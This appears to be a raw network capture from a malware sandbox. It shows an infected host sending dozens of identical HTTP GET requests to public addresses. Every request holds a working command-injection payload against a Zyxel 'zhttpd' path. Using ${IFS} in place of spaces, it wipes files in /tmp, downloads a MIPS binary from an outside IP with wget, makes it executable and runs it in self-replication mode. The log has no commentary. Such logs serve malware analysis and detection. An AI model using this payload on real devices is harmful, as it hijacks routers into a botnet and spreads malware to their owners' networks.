                                                Jan 29, 2024 07:07:45.261653900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3534192.168.2.2348522110.211.102.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261746883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3535192.168.2.2338280105.90.198.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261802912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3536192.168.2.2339260154.68.95.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261871099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3537192.168.2.235848490.238.180.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261991024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3538192.168.2.233321445.30.212.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262051105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3539192.168.2.2336052100.7.208.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262120962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3540192.168.2.2356802149.24.244.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262237072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3541192.168.2.234405672.7.253.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262288094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3542192.168.2.234412061.218.20.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262373924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3543192.168.2.2344376134.218.124.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262481928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3544192.168.2.2347714199.199.215.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262523890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3545192.168.2.2350454154.197.103.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262631893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3546192.168.2.2335904194.181.227.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262712955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3547192.168.2.2341700156.115.26.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262798071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3548192.168.2.234634478.120.244.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.262850046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3549192.168.2.234061262.228.205.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263097048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3550192.168.2.2354304185.201.235.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263160944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3551192.168.2.2346352162.156.206.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263242006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3552192.168.2.2346216192.254.191.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263310909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3553192.168.2.2346800203.49.125.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263397932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3554192.168.2.2351658197.138.2.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263443947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3555192.168.2.2341748194.221.221.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263514042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3556192.168.2.2343780168.196.118.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263572931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3557192.168.2.2357910205.209.0.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263660908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3558192.168.2.2347706165.50.2.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263714075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3559192.168.2.234589888.214.9.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263780117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3560192.168.2.2337202147.32.82.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263833046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3561192.168.2.2356540169.50.88.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263889074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3562192.168.2.2357346130.211.69.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.263950109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3563192.168.2.235887619.254.138.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264019012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3564192.168.2.234760048.161.36.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264079094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3565192.168.2.2341352174.247.227.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264147997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3566192.168.2.2343932205.140.124.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264213085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3567192.168.2.2341040202.38.146.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264281988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3568192.168.2.234011696.167.26.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264349937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3569192.168.2.235108649.147.41.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264415026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3570192.168.2.235466899.235.255.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264480114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3571192.168.2.234819666.204.61.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264539957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3572192.168.2.2351728217.147.201.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264592886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3573192.168.2.2343980146.91.102.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264673948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3574192.168.2.2355244197.69.58.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264736891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3575192.168.2.2359710103.248.113.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264779091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3576192.168.2.2335820178.59.156.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264831066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3577192.168.2.2340690196.84.227.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264894962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3578192.168.2.2356778131.163.9.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.264960051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3579192.168.2.2352558102.235.178.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265043020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3580192.168.2.235116232.171.219.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265100956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3581192.168.2.235378824.188.162.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265166044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3582192.168.2.23526865.53.217.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265244007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3583192.168.2.2354688109.77.179.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265307903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3584192.168.2.235187273.136.67.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265368938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3585192.168.2.2358324119.218.233.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265435934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3586192.168.2.234305458.61.97.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265510082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3587192.168.2.234883037.113.123.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265568018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3588192.168.2.2332926205.208.126.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265645981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3589192.168.2.23520588.19.149.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265701056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3590192.168.2.2349574103.54.192.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265782118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3591192.168.2.2335586135.176.68.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265820026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3592192.168.2.2354552120.133.179.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265917063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3593192.168.2.2355110157.246.116.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.265970945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3594192.168.2.23514625.97.214.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266021013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3595192.168.2.233525048.34.63.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266108990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3596192.168.2.234559499.253.70.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.266161919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3597192.168.2.233815650.140.158.12443
                                                TimestampBytes transferredDirectionData
